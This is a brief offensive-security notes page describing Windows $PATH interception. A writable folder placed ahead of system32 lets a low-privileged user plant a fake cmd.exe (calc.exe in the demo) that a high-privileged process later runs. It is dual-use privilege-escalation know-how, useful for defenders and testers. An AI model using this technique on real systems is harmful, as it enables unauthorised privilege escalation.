Environment Variable $Path Interception

It's possible to abuse $PATH environment variable to elevate privileges if the variable:

  • contains a folder that a malicious user can write to

  • that folder precedes c:\windows\system32\

Below is an example, showing how c:\temp precedes c:\windows\system32:

Let's make sure c:\temp is (M)odifiable by low privileged users:

Let's now drop our malicious file (calc.exe in this case) into c:\temp and call it cmd.exe:

Now, the next time a high privileged user invokes cmd.exe, our malicious cmd.exe will be invoked from the c:\temp:

This can be very easily abused in environments where software deployment packages call powershell, cmd, cscript and other similar system binaries with NT SYSTEM privileges to carry out their tasks.

Last updated